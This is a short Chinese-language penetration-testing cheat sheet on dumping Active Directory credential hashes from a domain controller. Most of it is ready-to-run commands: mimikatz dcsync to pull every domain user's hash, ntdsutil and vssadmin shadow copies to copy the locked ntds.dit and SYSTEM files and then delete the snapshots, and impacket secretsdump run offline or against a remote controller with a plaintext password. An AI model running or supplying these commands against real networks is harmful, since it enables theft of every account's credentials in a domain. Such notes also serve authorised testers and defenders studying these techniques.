DumpHash

ntds.dit 为 ad 的数据库，内容有域用户、域组、用户 hash 等信息，域控上的 ntds.dit 只有可以登录到域控的用户（ 如域管用户、DC本地管理员用户 ）可以访问。

ntds.dit 包括三个主要表：数据表、链接表、sd 表。所以只要在域渗透中能够获取到 ntds.dit 就可以获取到所有域用户的用户名和对应的 hash，ntds.dit 是加密的，需要获取 system 文件来解密。

ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit

system文件位置:C:\Windows\System32\config\SYSTEM

在通常的情况下,即使我们拥有域管理员权限也无法读取 ntds.dit 文件,因为活动目录始终访问着这个文件,所以禁止读取,使用 windows 的本地卷影拷贝可以获得文件的副本。

mimikatz

mimikatz 有一个功能（dcsync），它利用目录复制服务（DRS）从 NTDS.DIT 文件中检索密码 Hash 值。

# 所有用户
Mimikatz "lsadump::dcsync /domain:test.com /all /csv" exit > hash.txt

# 指定用户
Mimikatz "lsadump::dcsync /domain:test.com /user:username" exit > hash.txt

系统工具

导出

ntdsutil

Ntdsutil 域控制器默认安装，使管理员能访问和管理 Windows Active Directory 数据库。渗透测试中可以用它来拍摄 ntds.dit 文件的快照

# 创建快照 - 执行成功后会有 {0cf3ebc8-3f7a-415f-95f7-8e8cf923cecb}
ntdsutil snapshot "activate instance ntds" create quit quit

# 加载快照 - 执行成功后会有路径 C:\$SNAP_202302081523_VOLUMEC$\Windows\
ntdsutil snapshot "mount {0cf3ebc8-3f7a-415f-95f7-8e8cf923cecb}" quit quit

# copy ntds.dit 和 SYSTEM 文件
copy C:\$SNAP_202302081523_VOLUMEC$\Windows\NTDS\ntds.dit C:\users\administrator\desktop\
copy C:\$SNAP_202302081523_VOLUMEC$\Windows\System32\config\SYSTEM C:\users\administrator\desktop\

# 卸载并删除快照
ntdsutil snapshot "unmount {0cf3ebc8-3f7a-415f-95f7-8e8cf923cecb}" "delete {0cf3ebc8-3f7a-415f-95f7-8e8cf923cecb}" quit quit

vssadminn

vssadminn 是 Windows Server 2008 及 Windows 7 提供的 VSS 管理工具，可用于创建和删除卷影拷贝、列出卷影拷贝的信息（只能管理系统Provider 创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序( writers )和提供程序( providers )，以及改变卷影拷贝的存储空间(即所谓的 “diff空间” )的大小等。

# 创建卷影拷贝
vssadmin create shadow /for=c:

# copy 卷影中的 ntds.di t和 system 文件
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit c:\users\administrator\desktop\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM C:\users\administrator\desktop\SYSTEM

# 删除卷影拷贝
vssadmin delete shadows /for=c: /quiet

提取

impacket

python3 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

python3 secretsdump.py luckysec.cn/administrator:admin!@#45@10.10.10.10 -just-dc